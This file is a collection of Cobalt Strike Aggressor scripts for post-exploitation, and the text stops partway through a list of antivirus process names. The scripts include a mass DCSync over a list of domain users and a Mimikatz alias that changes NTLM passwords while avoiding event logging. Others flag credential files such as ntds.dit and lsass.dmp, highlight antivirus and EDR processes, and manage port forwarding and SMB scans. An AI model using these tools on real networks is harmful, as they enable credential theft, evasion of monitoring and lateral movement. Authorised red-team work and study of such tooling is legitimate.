$TIMES_TO_DISPLAY_COLORS_SCHEME = 3;
sub interpretSize {
local('$s $size');
$s = $1;
if($s == 0) {
$size = "";
}
else if($s < 1024) {
$size .= $s . "B";
}
else if($s < 1024 * 1024) {
$size = round($s / 1024.0, 1);
$size .= "KB";
}
else if($s < 1024 * 1024 * 1024) {
$size = round(($s / 1024.0) / 1024, 1);
$size .= "MB";
}
else if($s < 1024 * 1024 * 1024 * 1024) {
$size = round((($s / 1024.0) / 1024) / 1024, 1);
$size .= "GB";
}
return $size;
}
set BEACON_OUTPUT_LS {
local('$totalsize @subl $outls $temp $size $s $ext $dotpos $type $lastmod $name @lines @ls');
this('$once');
@lines = split("\n", ["$2" trim]);
@configuration = @('config', 'conf', 'json', 'yml', 'xml', 'inf', 'properties', 'settings');
@sensitive = @('ost', 'dmp', 'sqlite', 'sqlite3', 'kdbx', 'kdb', 'dit', 'kirbi', 'ccache', 'kirbis', 'git');
@sensitive_files = @('ntds.dit', 'lsass.dmp');
@archives = @('rar', 'zip', '7z', 'tar', 'gz', 'bz2', 'iso');
@exes = @('msi', 'sys', 'exe', 'dll', 'bat', 'sct');
@docs = @('csv', 'odt', 'dotx', 'dotm', 'docm', 'xlam', 'xll', 'xlm', 'xlsm', 'xltx', 'msg', 'rtf', 'txt', 'pdf', 'docx', 'doc', 'xls', 'xlsx', 'ppt', 'pptx', 'pptm', 'odp', 'ppsm', 'ppa', 'ppam');
@sources = @('cpp', 'md', 'h', 'hpp', 'c', 'pl', 'sql', 'php', 'py', 'java', 'rb',
'html', 'js', 'css', 'asp', 'aspx', 'cs', 'vbs', 'vbe', 'jse', 'ps1', 'sln', 'vcxproj', 'csproj', 'gitignore', 'gitmodules', 'gitattributes');
if($once < $TIMES_TO_DISPLAY_COLORS_SCHEME) {
$outls .= "\cC[*]\o Colors scheme:\n";
$outls .= "\cC[*]\o ---------------------------\n";
$outls .= "\cC[*]\o Directories: \c8 YELLOW \o\n";
$outls .= "\cC[*]\o Cobalt Strike Uploaded Files: \cBBLUE\o\n";
$outls .= "\cC[*]\o Sensitive files: \c4 RED \o\n";
$outls .= "\cC[*]\o Configuration files: \c3 DARK GREEN \o\n";
$outls .= "\cC[*]\o Archives: \c7 ORANGE \o\n";
$outls .= "\cC[*]\o Source codes: \cC DARK BLUE \o\n";
$outls .= "\cC[*]\o Executables: \cD MAGENTA \o\n";
$outls .= "\cC[*]\o Documents: \c9 GREEN \o\n";
$once += 1;
}
$outls .= "\c9[+]\o Location: \cC" . @lines[0] . "\o\n\n";
$outls .= " Size Type Last Modified Name\n";
$outls .= " ---- ---- ------------------- ----\n";
@subl = sublist(@lines, 1);
$totalsize = 0;
foreach $temp (@subl) {
($type, $s, $lastmod, $name) = split("\t", $temp);
if ($name eq "." || $name eq "..") {
continue;
}
if($type eq "D") { $type = "dir"; }
else if($type eq "F") { $type = "fil"; }
$s = int($s);
$totalsize += $s;
$size = interpretSize($s);
$dotpos = lindexOf($name, '.');
$ext = "";
if(($dotpos) ) {
$ext = lc(substr($name, $dotpos + 1));
}
if($type eq "dir") {
# Directories in YELLOW
push(@ls, %(type => $type, name => $name, entry => "\c8 $[10]size $[7]type\o $[21]lastmod\c8 $name \o"));
}
else if($name in @UPLOADED_FILE_NAMES) {
# Uploaded Files through Cobalt Strike (the ones we still keep track off) in Blue
push(@ls, %(type => $type, name => $name, entry => "\cB $[10]size $[7]type\o $[21]lastmod\cB $name $+ \o"));
}
else if(($ext in @sensitive) || (lc($name) in @sensitive_files)) {
# Sensitive files in Red
push(@ls, %(type => $type, name => $name, entry => "\c4 $[10]size $[7]type\o $[21]lastmod\c4 $name \o"));
}
else if($ext in @exes) {
# Executables in Magenta
push(@ls, %(type => $type, name => $name, entry => "\cD $[10]size $[7]type\o $[21]lastmod\cD $name \o"));
}
else if($ext in @interesting) {
# Configuration files in Dark Green
push(@ls, %(type => $type, name => $name, entry => "\c3 $[10]size $[7]type\o $[21]lastmod\c3 $name \o"));
}
else if($ext in @sources) {
# Source codes in Dark Blue
push(@ls, %(type => $type, name => $name, entry => "\cC $[10]size $[7]type\o $[21]lastmod\cC $name \o"));
}
else if($ext in @archives) {
# Archives in Orange
push(@ls, %(type => $type, name => $name, entry => "\c7 $[10]size $[7]type\o $[21]lastmod\c7 $name \o"));
}
else if($ext in @docs) {
# Documents in Green
push(@ls, %(type => $type, name => $name, entry => "\c9 $[10]size $[7]type\o $[21]lastmod\c9 $name \o"));
}
else {
push(@ls, %(type => $type, name => $name, entry => " $[10]size $[7]type $[21]lastmod $name \o"));
}
}
sort({ return ($1['type'] cmp $2['type']); }, @ls);
foreach $temp (@ls) {
$outls .= $temp['entry'] . "\n";
}
$totalsize = interpretSize($totalsize);
$outls .= "\nFiles and dirs count: " . size(@ls) . ", total size of files: $totalsize \n";
return $outls;
}
sub collectUploadedFiles {
local('%entry %archives');
%archives = data_query('archives');
if(size(%archives) == 0) {
return;
}
foreach %entry (%archives) {
if (%entry['type'] ne "task") {
continue;
}
if(indexOf(%entry['data'], "upload ") == 0) {
if(%entry['data'] ismatch '^upload ("[^"]+"|[^\s]+) as ("[^"]+"|[^\s]+)$') {
($from, $to) = matched();
push(@UPLOADED_FILE_NAMES, getFileName($to));
}
}
}
}
on beacon_tasked {
local('$from $to');
if($2 ismatch 'Tasked beacon to upload ("[^"]+"|[^\s]+) as (.+)') {
($from, $to) = matched();
push(@UPLOADED_FILE_NAMES, getFileName($to));
}
}
on beacon_input {
local('$from $to');
if ($3 ismatch '^upload2? ("[^"]+"|[^\s]+) ?("[^"]+"|[^\s]+)?$') {
($from, $to) = matched();
push(@UPLOADED_FILE_NAMES, getFileName($to));
}
# Remove file track as the file was requested to be deleted
#else if ($3 ismatch '(?:shell|powershell|run) del (\w+)') {
# ($from) = matched();
# $from = getFileName($from);
# if($from in @UPLOADED_FILE_NAMES) {
# remove(@UPLOADED_FILE_NAMES, $from);
# }
#}
}
collectUploadedFiles();
#
# Forwarded_Ports.cna
#
# Keeps track of configured remote port forwardings on all Beacons and lets kill them easily.
#
# Using 'rportfwd' here and there quickly consumes pool of available local ports
# from which to forward traffic outbound and keeping track of them manually becomes tedious
# on a long-haul projects. This script aims to fill that gap by collecting these commands
# and presenting them in a nice visualization pane.
#
# CREDIT:
# This script is a reworked version of `leave_no_trace.cna` by Alyssa (ramen0x3f):
# https://github.com/ramen0x3f/AggressorScripts/blob/master/leave_no_trace.cna
#
# who in turn used work made by @001SPARTaN and @r3dqu1nn that came up with `logvis.cna`
# implementation:
# https://github.com/invokethreatguy/AggressorCollection/blob/master/harleyQu1nn/logvis.cna
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
import ui.*;
import table.*;
import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;
global('$forwarded_ports_model $forwarded_ports_table %forwarded_ports_looking');
sub create_vis {
## This is the fancy code from @001SPARTaN and @r3dqu1nn
local('$sorter $content');
$forwarded_ports_model = [new GenericTableModel: @(
"timestamp",
"beacon_id",
"beacon_pid",
"beacon_ip",
"beacon_user",
"local_port",
"remote_host",
"remote_port"
),
"beacon", 16];
# Create a table from the GenericTableModel
$forwarded_ports_table = [new ATable: $forwarded_ports_model];
# Controls how the column headers will sort the table
$sorter = [new TableRowSorter: $forwarded_ports_model];
# Doubled-toggle will make DESC sort instead of ASC
[$sorter toggleSortOrder: 7];
[$sorter toggleSortOrder: 7];
[$sorter setComparator: 0, {
return $1 cmp $2;
}];
[$sorter setComparator: 1, {
return $1 cmp $2;
}];
[$sorter setComparator: 2, {
return $1 <=> $2;
}];
[$sorter setComparator: 3, {
return $1 cmp $2;
}];
[$sorter setComparator: 4, {
return $1 cmp $2;
}];
[$sorter setComparator: 5, {
return $1 <=> $2;
}];
[$sorter setComparator: 6, {
return $1 <=> $2;
}];
[$sorter setComparator: 7, {
return $1 <=> $2;
}];
# Set $sorter as the row sorter for $forwarded_ports_table
[$forwarded_ports_table setRowSorter: $sorter];
# Create a split pane (divider you can drag around)
$content = [new JScrollPane: $forwarded_ports_table];
# Set popup menu for the table
setup_popupFT($forwarded_ports_table, "forwarded_ports_menu");
update_tableFT();
# Register the visualization with CS
addVisualization("Forwarded Ports", $content);
return $content;
}
sub search_archives {
## Parses archives to pull out uploads for the Leave No Trace tab
## Returns all the items to add to the model
local('@output $found @linesAdd @linesRemove @bids %entry $bid');
@bids = beacon_ids();
@output = @();
@linesAdd = @();
@linesRemove = @();
foreach %entry (data_query("archives")) {
# To speed search up, we only limit enumeration of task-type entries.
if(%entry['type'] ne "task") {
continue;
}
# rportfwd add task
if(indexOf(%entry['data'], "forward port ") == 0) {
if(%entry['data'] ismatch 'forward port (\d+) to ([^:]+):(\d+)') {
($localport, $remotehost, $remoteport) = matched();
$bid = %entry['bid'];
if ( $bid !in @bids ) {
continue;
}
add(@linesAdd, %(
timestamp => %entry['when'],
beacon_id => $bid,
beacon_pid => beacon_info($bid, "pid"),
beacon_ip => beacon_info($bid, "host"),
beacon_user => beacon_info($bid, "user"),
local_port => $localport,
remote_host => $remotehost,
remote_port => $remoteport,
));
}
}
# rportfwd stop task
if(indexOf(%entry['data'], "stop port forward on ") == 0) {
if(%entry['data'] ismatch 'stop port forward on (\d+)') {
$localport = matched()[0];
$bid = %entry['bid'];
if ( $bid !in @bids ) {
continue;
}
add(@linesRemove, %(
timestamp => %entry['when'],
beacon_id => $bid,
local_port => $localport,
));
}
}
}
sort({ return $1['timestamp'] < $2['timestamp']; }, @linesAdd);
sort({ return $1['timestamp'] < $2['timestamp']; }, @linesRemove);
# Unfilter lines that stopped remote port forwarding
foreach $lineAdd (@linesAdd) {
$dontAdd = 0;
foreach $lineRem (@linesRemove) {
if(($lineAdd['local_port'] eq $lineRem['local_port']) && ($lineAdd['beacon_id'] eq $lineRem['beacon_id'])) {
if($lineRem['timestamp'] >= $lineAdd['timestamp']) {
$dontAdd = 1;
break;
}
}
}
if($dontAdd == 0) {
$lineAdd['timestamp'] = dstamp($lineAdd['timestamp']);
add(@output, $lineAdd);
}
}
return @output;
}
sub setup_popupFT {
# setup_popup provided by Raphael Mudge
# https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2
# we're using fork({}) to run this in a separate Aggressor Script environment.
# This reduces deadlock potential due to Sleep's global interpreter lock
#
# this especially matters as our mouse listener will be fired for *everything*
# to include mouse movements.
fork({
[$component addMouseListener: lambda({
if ([$1 isPopupTrigger]) {
# If right click, show popup
show_popup($1, $name, $component);
}
}, \$component, \$name)];
}, $component => $1, $name => $2, $forwarded_ports_model => $forwarded_ports_model, $forwarded_ports_table => $forwarded_ports_table);
}
sub update_tableFT {
## Updates the Leave No Trace tab
## As a note: when you fork() you have to pass all global
## variables (see \$forwarded_ports_model and \%forwarded_ports_looking) or you'll go insane.
fork({
local('%entry');
# Clear the model so we can put new stuff in it.
[$forwarded_ports_model clear: 1024];
foreach %entry (search_archives()) {
# Add the new entry to $forwarded_ports_model
[$forwarded_ports_model addEntry: %entry];
}
# Update with the new table
[$forwarded_ports_model fireListeners];
}, \$forwarded_ports_model, \%forwarded_ports_looking);
}
popup forwarded_ports_menu {
item "Kill port forwarding" {
local('$dir $dest $file $ip');
foreach $row ([$forwarded_ports_table getSelectedRows]) {
$bid = [$forwarded_ports_model getValueAt: $row, 1];
$localip = [$forwarded_ports_model getValueAt: $row, 3];
$localport = [$forwarded_ports_model getValueAt: $row, 5];
$remotehost = [$forwarded_ports_model getValueAt: $row, 6];
$remoteport = [$forwarded_ports_model getValueAt: $row, 7];
prompt_confirm("Are you sure you want to stop remote port forwarding from $localip $+ : $+ $localport to $remotehost $+ : $+ $remoteport $+ ?", "Stop remote port forwarding", lambda({
brportfwd_stop($bid, $localport);
show_message("Remote port forwarding from $localip $+ : $+ $localport stopped.");
}, $bid => $bid, $localip => $localip, $localport => $localport));
}
}
}
popup view {
item "Remote Forwarded Ports" {
addTab("Remote Forwarded Ports", create_vis(), "All forwarded/remote forwarded ports");
}
}
on beacon_error {
if(indexOf($2, "Could not bind to ") == 0) {
# Dummy rportfwd stop to maintain our archives integrity by having both start and stop commands, even
# in a case of failure.
if($2 ismatch 'Could not bind to (\d+)') {
brportfwd_stop!($1, matched()[0]);
}
}
}
#
# Highlights new checking-in Beacons green and these exiting ones red for a defined time.
#
# Author:
# Mariusz B. / mgeeky, "20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
global('%KNOWN_BEACONS $HIGHLIGHT_DURATION %HIGHLIGHTS');
# Hightlight duration expressed in miliseconds
$HIGHLIGHT_DURATION = 5000;
%HIGHLIGHTS = %(
initial => "good",
exit => "bad",
exited => "ignore",
error => "neutral",
output => ""
);
# ---------------------------------------
# Do not alter variables below this point
%KNOWN_BEACONS = %();
sub getBeaconEntry {
return @(bdata($1));
}
sub highlightBeacon {
local('@entry $bid $col $cur');
(@entry, $bid, $col) = @_;
$cur = binfo($bid, "_accent");
if($cur ne %HIGHLIGHTS[$col]) {
%KNOWN_BEACONS[$bid]["prev-accent"] = $cur;
highlight("beacons", @entry, %HIGHLIGHTS[$col]);
}
}
on beacon_initial {
local('@entry');
if($1 in keys(%KNOWN_BEACONS)) {
return;
}
%KNOWN_BEACONS[$1] = %();
%KNOWN_BEACONS[$1]["ticks"] = ticks();
@entry = getBeaconEntry($1);
if(@entry) {
%KNOWN_BEACONS[$1]["status"] = 'initial';
highlightBeacon(@entry, $1, "initial");
}
}
on beacon_output {
local('@entry');
if($1 !in keys(%KNOWN_BEACONS)) {
%KNOWN_BEACONS[$1] = %();
}
%KNOWN_BEACONS[$1]["ticks"] = ticks();
@entry = getBeaconEntry($1);
if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) {
highlightBeacon(@entry, $1, "output");
}
}
# doesn't work for some reason.
on beacon_output_alt {
local('@entry');
if($1 !in keys(%KNOWN_BEACONS)) {
%KNOWN_BEACONS[$1] = %();
}
%KNOWN_BEACONS[$1]["ticks"] = ticks();
@entry = getBeaconEntry($1);
if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) {
highlightBeacon(@entry, $1, "output");
}
}
on beacon_error {
local('@entry');
if($1 !in keys(%KNOWN_BEACONS)) {
%KNOWN_BEACONS[$1] = %();
}
%KNOWN_BEACONS[$1]["ticks"] = ticks();
@entry = getBeaconEntry($1);
if(@entry && (%HIGHLIGHTS["error"] ne "")) {
%KNOWN_BEACONS[$1]["status"] = 'error';
highlightBeacon(@entry, $1, "error");
}
}
on beacon_input {
local('@entry');
if($1 !in keys(%KNOWN_BEACONS)) {
%KNOWN_BEACONS[$1] = %();
}
if ($3 eq "exit") {
%KNOWN_BEACONS[$1]["ticks"] = ticks();
@entry = getBeaconEntry($1);
if(@entry) {
%KNOWN_BEACONS[$1]["status"] = 'exiting';
highlightBeacon(@entry, $1, "exit");
}
remove(%KNOWN_BEACONS, %KNOWN_BEACONS[$1]);
}
}
on heartbeat_1s {
local('$diff $b @entry');
foreach $bid (keys(%KNOWN_BEACONS)) {
$b = %KNOWN_BEACONS[$bid];
if("ticks" in keys($b)) {
if(strlen($b["ticks"]) > 0) {
$diff = ticks() - $b["ticks"];
if($diff >= $HIGHLIGHT_DURATION) {
@entry = getBeaconEntry($bid);
if(@entry) {
if(%KNOWN_BEACONS[$bid]["status"] eq "exiting") {
%KNOWN_BEACONS[$1]["status"] = 'exited';
highlightBeacon(@entry, $bid, "exited");
}
else {
#%KNOWN_BEACONS[$bid]["prev-accent"] = binfo($1, "_accent");
highlight("beacons", @entry, %KNOWN_BEACONS[$bid]["prev-accent"]);
%KNOWN_BEACONS[$1]["status"] = "";
}
}
%KNOWN_BEACONS[$bid]["ticks"] = "";
}
}
}
}
}
# Beacon Command Log visualization
# Author: @001SPARTaN (for @r3dqu1nn)
# Tracks all your commands you executed on every beacon
import ui.*;
import table.*;
import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;
global('$model $console $table');
$model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16];
sub updateTableLog {
fork({
local('$entry');
# Clear the model so we can put new stuff in it.
[$model clear: 1024];
foreach @entry (data_query('beaconlog')) {
if (@entry[0] eq "beacon_input") {
%modelEntry['operator'] = @entry[2];
$bid = @entry[1];
%modelEntry['ip'] = binfo($bid, "internal");
%modelEntry['hostname'] = binfo($bid, "computer");
%modelEntry['user'] = binfo($bid, "user");
%modelEntry['pid'] = binfo($bid, "pid");
%modelEntry['command'] = @entry[3];
%modelEntry['timestamp'] = formatDate(@entry[4], "MMM dd HH:mm:ss z");
# Add the new entry to $model
[$model addEntry: %modelEntry];
}
}
# Update with the new table
[$model fireListeners];
}, \$model);
}
# setupPopupMenu provided by Raphael Mudge
# https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2
sub setupPopupMenu {
# we're using fork({}) to run this in a separate Aggressor Script environment.
# This reduces deadlock potential due to Sleep's global interpreter lock
#
# this especially matters as our mouse listener will be fired for *everything*
# to include mouse movements.
fork({
[$component addMouseListener: lambda({
if ([$1 isPopupTrigger]) {
# If right click, show popup
show_popup($1, $name, $component);
}
}, \$component, \$name)];
}, $component => $1, $name => $2, $model => $model, $table => $table);
}
sub createVisualizationLog {
this('$client');
# GenericTableModel from table.*
# Columns for each data model
$model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16];
# Create a table from the GenericTableModel
$table = [new ATable: $model];
# Controls how the column headers will sort the table
$sorter = [new TableRowSorter: $model];
[$sorter toggleSortOrder: 3];
[$sorter setComparator: 0, {
return $1 cmp $2;
}];
[$sorter setComparator: 1, {
return $1 cmp $2;
}];
[$sorter setComparator: 2, {
return $1 cmp $2;
}];
[$sorter setComparator: 3, {
return $1 <=> $2;
}];
# Set $sorter as the row sorter for $table
[$table setRowSorter: $sorter];
# Create a split pane (divider you can drag around)
$content = [new JScrollPane: $table];
# Set popup menu for the table
setupPopupMenu($table, "command_log");
updateTableLog();
# Register the visualization with CS
addVisualization("Beacon Command Log", $content);
return $content;
}
popup command_log {
item "Copy" {
println("Right click captured!");
$selected = "";
foreach $row ([$table getSelectedRows]) {
# operator [ip_hostname] user/proc | timestamp> command
$operator = [$model getValueAt: $row, 0];
$ip = [$model getValueAt: $row, 1];
$hostname = [$model getValueAt: $row, 2];
$user = [$model getValueAt: $row, 3];
$proc = [$model getValueAt: $row, 4];
$time = [$model getValueAt: $row, 6];
$command = [$model getValueAt: $row, 5];
$selected .= "$operator \[$ip\_$hostname\] $user\/$proc | $time\> $command\n";
}
add_to_clipboard($selected);
}
}
popup view {
item "Command Log" {
# Show the visualization
addTab("Beacon Command Log", createVisualizationLog(), "All commands you have executed in a beacon");
}
}
on beacon_input {
updateTableLog();
}
#author:bluescreenofjeff
#Mass DCSync a list of usernames from the specified domain
#Note: The username list should include one user's shortname per line
sub mass-dcsync {
@bids = $1;
$dialog = dialog("Mass DCSync", %(fqdn => "example.local", domain => 'EXAMPLE', userlist => "/path/to/userlist"), lambda({
$handle = openf($3['userlist']);
@userlistdata = readAll($handle);
closef($handle);
foreach $bid (@bids){
foreach $user (@userlistdata){
bdcsync($bid, $3['$fqdn'], $3['domain'] . $+ . '\\' . $+ . $user);
};
};
}));
dialog_description($dialog, "Mass DCSync a list of usernames from the specified domain.");
drow_text($dialog, "fqdn", "Domain FQDN:");
drow_text($dialog, "domain", "Domain Shortname:");
drow_file($dialog, "userlist", "List of users:");
dbutton_action($dialog, "Ok");
dialog_show($dialog);
}
popup beacon_bottom {
item "Mass DCSync" {
mass-dcsync($1);
}
}
# Cobalt Strike Mimikatz Enhancement CNA Addon
# Created by @vysecurity
#
# Credits to @armitagehacker (cobaltstrike) and @gentilkiwi (mimikatz)
alias password_change {
# $2: Username
# $3: Old hash or password
# $4: New hash or password
# $5: SERVERNAME/DC/Localhost
$bid = $1;
$user = $2;
$old = $3;
$new = $4;
$server = $5;
if ($user && $old && $new){
$command = "lsadump::changentlm /user:$user";
# Check if $old is a hash
if ($old ismatch '[a-fA-F0-9]{32}'){
$command = $command . " /oldntlm:$old";
}
else {
$command = $command . " /oldpassword:$old";
}
# Check if new is a hash
if ($new ismatch '[a-fA-F0-9]{32}'){
$command = $command . " /newntlm:$new";
}
else{
$command = $command . " /newpassword:$new";
}
if ($server){
$command = $command . " /server:$server";
}
else{
berror("No server specified, defaulting to localhost.");
}
prompt_confirm("Are you sure you want to execute?\nCommand: $command", "Confirmation", {
btask($bid, "$command");
bmimikatz($bid, "$command");
});
}
else{
berror($1,"Missing parameters, you need exactly 4.");
}
}
beacon_command_register("password_change", "Executes a password change which allows you to change the NTLM password for a given account.",
"Syntax: password_change [Username] [Known old hash or password] [New hash or password] [SERVER/DC/localhost] \n" .
"Uses Mimikatz's password change functionality which allows you to change the NTLM password for a given account without the setpassword event logging.\n".
"Useful for situations where you do not know the cleartext original password so you can change the password quickly and reset the NTLM hash after you're done.");
#author bluescreenofjeff
#alias for "qping" to "shell ping -n 1 [target]" and "smbscan" to "portscan [target] 445 none"
#register help
beacon_command_register("qping", "send one ping packet with shell",
"Synopsis: qping [target]\n\n" .
"Send one ping packet with the command: shell ping -n 1 [target]");
#setting the alias
alias qping {
binput($1,"shell ping -n 1 $2");
bshell($1,"ping -n 1 $2");
}
#register help
beacon_command_register("smbscan", "portscans port 445 without ping discovery",
"Synopsis: smbscan [target]\n\n" .
"Scans SMB with the command: portscan [targets] none\n\n" .
"[targets] is a comma separated list of hosts to scan. You may also specify\n" .
"IPv4 address ranges (e.g., 192.168.1.128-192.168.2.240, 192.168.1.0/24)");
#setting the alias
alias smbscan {
binput("portscan $1 445 none");
bportscan($1, $2, "445", "none");
}
#### Port Scan Results ####
## See and sort results from portscan module in a new tab
## Author: Alyssa (@ramen0x3f)
## Last Updated: 2018-08-08
## CREDIT ##
# This script uses the awesome visualization/tab code made by @001SPARTaN (for @r3dqu1nn)
# As seen here: https://github.com/harleyQu1nn/AggressorScripts/blob/master/logvis.cna
## Usage ##
# View > "Port Scan Results". Click column to sort.
######################################################################
import ui.*;
import table.*;
import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;
global('$portScanModel $console $table');
sub updateTablePSR {
fork({
local('$entry');
# Clear the model so we can put new stuff in it.
[$portScanModel clear: 1024];
foreach @entry (data_query('services')) {
%modelEntry['address'] = @entry['address'];
%modelEntry['port'] = @entry['port'];
%modelEntry['banner'] = @entry['banner'];
# Add the new entry to $portScanModel
[$portScanModel addEntry: %modelEntry];
}
# Update with the new table
[$portScanModel fireListeners];
}, \$portScanModel);
}
sub createVisualizationPSR {
this('$client');
# GenericTableModel from table.*
# Columns for each data model
$portScanModel = [new GenericTableModel: @("address", "port", "banner"), "beacon", 16];
# Create a table from the GenericTableModel
$table = [new ATable: $portScanModel];
# Controls how the column headers will sort the table
$sorter = [new TableRowSorter: $portScanModel];
[$sorter toggleSortOrder: 3];
[$sorter setComparator: 0, {
return $1 cmp $2;
}];
[$sorter setComparator: 1, {
return $1 cmp $2;
}];
[$sorter setComparator: 2, {
return $1 cmp $2;
}];
[$sorter setComparator: 3, {
return $1 <=> $2;
}];
# Set $sorter as the row sorter for $table
[$table setRowSorter: $sorter];
# Create a split pane (divider you can drag around)
$content = [new JScrollPane: $table];
# Set popup menu for the table
setupPopupMenu($table, "command_log");
updateTablePSR();
# Register the visualization with CS
addVisualization("Port Scan Results", $content);
return $content;
}
popup view {
item "Port Scan Results" {
# Show the visualization
addTab("Port Scan Results", createVisualizationPSR(), "All discovered services from portscan");
}
}
#Color Coded Process Listing
#Author: @r3dQu1nn
#Takes the PS output in CS and color codes all AV processes, explorer process, browsers processes, and current process running
#Thanks to @oldb00t for creating the original beacon-ps-highlight.cna script! Script here: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight
#This script removes the need for the av_hips_executables.txt requirement
set BEACON_OUTPUT_PS {
$bd = bdata($1);
@av = @("Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", "AvastUI.exe", "Avconsol.exe", "AvpM.exe", "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", "EndPointSecurity.exe", "EngineServer.exe", "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", "FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", "MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", "McWCECfg.exe", "Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", "PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", "PavPrSrv.exe", "PavProt.exe", "PavReport.exe", "Pavkre.exe", "PcCtlCom.exe", "PcScnSrv.exe", "PccNTMon.exe", "PccNTUpd.exe", "PpPpWallRun.exe", "PrintDevice.exe", "ProUtil.exe", "PsCtrlS.exe", "PsImSvc.exe", "PwdFiltHelp.exe", "Qoeloader.exe", "RAVMOND.exe", "RAVXP.exe", "RNReport.exe", 